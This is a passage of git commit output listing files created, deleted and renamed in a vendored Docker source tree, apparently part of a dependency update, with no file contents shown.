 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/logs.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/opts.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/opts_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/parse.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/ps.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/scale.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/trust.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/update.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/update_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/common.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/opts.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/ps.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/services.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/init.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join_token.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/leave.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/update.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/df.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/events.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/info.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/prune.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/system/version.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/task/print.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/trust.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/utils.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/prune.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example1.env
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example2.env
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/full-example.yml
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/bindata.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/template/template.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/template/template_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/compose/types/types.go
 create mode 100644 vendor/github.com/docker/docker/cli/config/configdir.go
 create mode 100644 vendor/github.com/docker/docker/cli/debug/debug.go
 rename vendor/github.com/docker/docker/{utils => cli/debug}/debug_test.go (71%)
 delete mode 100644 vendor/github.com/docker/docker/cli/flags/client.go
 delete mode 100644 vendor/github.com/docker/docker/cli/flags/common_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/trust/trust.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/config.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/config_test.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file_test.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/credentials.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store.go
 delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go
 create mode 100644 vendor/github.com/docker/docker/client/build_cancel.go
 create mode 100644 vendor/github.com/docker/docker/client/build_prune.go
 create mode 100644 vendor/github.com/docker/docker/client/config_create.go
 create mode 100644 vendor/github.com/docker/docker/client/config_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/config_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/config_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/config_list.go
 create mode 100644 vendor/github.com/docker/docker/client/config_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/config_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/config_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/config_update.go
 create mode 100644 vendor/github.com/docker/docker/client/config_update_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_prune_test.go
 create mode 100644 vendor/github.com/docker/docker/client/disk_usage_test.go
 create mode 100644 vendor/github.com/docker/docker/client/distribution_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/distribution_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/hijack_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_prune_test.go
 create mode 100644 vendor/github.com/docker/docker/client/network_prune_test.go
 create mode 100644 vendor/github.com/docker/docker/client/ping_test.go
 create mode 100644 vendor/github.com/docker/docker/client/session.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_unlock_test.go
 create mode 100644 vendor/github.com/docker/docker/client/task_logs.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unix.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_test.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_windows.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_unix.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_windows.go
 delete mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go
 rename vendor/github.com/docker/docker/{cli/flags/common.go => cmd/dockerd/options.go} (56%)
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/options_test.go
 create mode 100644 vendor/github.com/docker/docker/codecov.yml
 delete mode 100644 vendor/github.com/docker/docker/container/container_linux.go
 delete mode 100644 vendor/github.com/docker/docker/container/container_notlinux.go
 create mode 100644 vendor/github.com/docker/docker/container/env.go
 rename vendor/github.com/docker/docker/{utils/utils_test.go => container/env_test.go} (56%)
 delete mode 100644 vendor/github.com/docker/docker/container/state_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/container/state_unix.go
 delete mode 100644 vendor/github.com/docker/docker/container/state_windows.go
 create mode 100644 vendor/github.com/docker/docker/container/stream/attach.go
 create mode 100644 vendor/github.com/docker/docker/container/view.go
 create mode 100644 vendor/github.com/docker/docker/container/view_test.go
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile
 delete mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/contrib/completion/REVIEWERS
 delete mode 100644 vendor/github.com/docker/docker/contrib/completion/bash/docker
 delete mode 100644 vendor/github.com/docker/docker/contrib/completion/fish/docker.fish
 delete mode 100644 vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt
 delete mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS
 delete mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/_docker
 create mode 100755 vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris
 delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-busybox.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-rinse.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage/solaris
 delete mode 100755 vendor/github.com/docker/docker/contrib/project-stats.sh
 delete mode 100755 vendor/github.com/docker/docker/contrib/reprepro/suites.sh
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te
 delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz
 create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go
 create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/bindmount_solaris.go
 rename vendor/github.com/docker/docker/daemon/caps/{utils_unix.go => utils.go} (84%)
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/configs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/config.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/errors.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/filters_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/networks.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/noderunner.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/nodes.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/services.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/swarm.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/tasks.go
 create mode 100644 vendor/github.com/docker/docker/daemon/cluster/utils.go
 rename vendor/github.com/docker/docker/daemon/{ => config}/config.go (60%)
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_common_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/config_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/config/opts.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_common_unix.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_experimental.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_unix.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_unix_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_windows.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/config_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/configs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/configs_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/configs_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/configs_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_linux.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/container_operations_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/container_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/create_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/daemon_experimental.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/daemon_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/daemon_windows_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/debugtrap.go
 create mode 100644 vendor/github.com/docker/docker/daemon/dependency.go
 rename vendor/github.com/docker/docker/daemon/{ => discovery}/discovery.go (83%)
 create mode 100644 vendor/github.com/docker/docker/daemon/discovery/discovery_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/discovery_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/exec_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/exec_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/getsize_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/device_setup.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/errors.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/image.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/image_tag.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/cache.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_builder.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_commit.go
 rename vendor/github.com/docker/docker/daemon/{ => images}/image_delete.go (72%)
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_events.go
 rename vendor/github.com/docker/docker/daemon/{ => images}/image_exporter.go (61%)
 rename vendor/github.com/docker/docker/daemon/{ => images}/image_history.go (60%)
 rename vendor/github.com/docker/docker/daemon/{import.go => images/image_import.go} (60%)
 rename vendor/github.com/docker/docker/daemon/{ => images}/image_inspect.go (53%)
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_prune.go
 rename vendor/github.com/docker/docker/daemon/{ => images}/image_pull.go (50%)
 rename vendor/github.com/docker/docker/daemon/{ => images}/image_push.go (60%)
 rename vendor/github.com/docker/docker/daemon/{search.go => images/image_search.go} (66%)
 rename vendor/github.com/docker/docker/daemon/{search_test.go => images/image_search_test.go} (97%)
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_tag.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/image_windows.go
 rename vendor/github.com/docker/docker/daemon/{ => images}/images.go (71%)
 create mode 100644 vendor/github.com/docker/docker/daemon/images/locals.go
 create mode 100644 vendor/github.com/docker/docker/daemon/images/service.go
 create mode 100644 vendor/github.com/docker/docker/daemon/info_unix_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go
 rename vendor/github.com/docker/docker/daemon/{inspect_unix.go => inspect_linux.go} (78%)
 delete mode 100644 vendor/github.com/docker/docker/daemon/inspect_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/inspect_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/links_linux.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/links_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/links_notlinux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/list_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/listeners/group_unix.go
 rename vendor/github.com/docker/docker/{pkg/listeners/listeners_unix.go => daemon/listeners/listeners_linux.go} (75%)
 rename vendor/github.com/docker/docker/{pkg => daemon}/listeners/listeners_windows.go (94%)
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/adapter.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/adapter_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go
 rename vendor/github.com/docker/docker/{pkg => daemon/logger/jsonfilelog}/jsonlog/jsonlogbytes.go (76%)
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go
 rename vendor/github.com/docker/docker/{pkg/ioutils => daemon/logger/loggerutils/multireader}/multireader.go (92%)
 rename vendor/github.com/docker/docker/{pkg/ioutils => daemon/logger/loggerutils/multireader}/multireader_test.go (91%)
 delete mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go
 rename vendor/github.com/docker/docker/daemon/logger/{context.go => loginfo.go} (54%)
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/metrics.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/proxy.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/ring.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/ring_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/templates/templates.go
 create mode 100644 vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/metrics_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/metrics_unsupported.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_linux.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_windows.go
 rename vendor/github.com/docker/docker/{utils => daemon/names}/names.go (86%)
 create mode 100644 vendor/github.com/docker/docker/daemon/oci.go
 create mode 100644 vendor/github.com/docker/docker/daemon/oci_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/oci_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/reload.go
 create mode 100644 vendor/github.com/docker/docker/daemon/reload_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/reload_unix.go
 create mode 100644 vendor/github.com/docker/docker/daemon/reload_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/resize_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/secrets_windows.go
 create mode 100644 vendor/github.com/docker/docker/daemon/stats/collector.go
 rename vendor/github.com/docker/docker/daemon/{stats_collector_unix.go => stats/collector_unix.go} (69%)
 create mode 100644 vendor/github.com/docker/docker/daemon/stats/collector_windows.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_windows.go
 rename vendor/github.com/docker/docker/{api/fixtures => daemon/testdata}/keyfile (100%)
 create mode 100644 vendor/github.com/docker/docker/daemon/trustkey.go
 create mode 100644 vendor/github.com/docker/docker/daemon/trustkey_test.go
 delete mode 100644 vendor/github.com/docker/docker/daemon/update_solaris.go
 create mode 100644 vendor/github.com/docker/docker/daemon/util_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes_linux.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/errors_test.go
 delete mode 100644 vendor/github.com/docker/docker/docs/README.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/README.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png
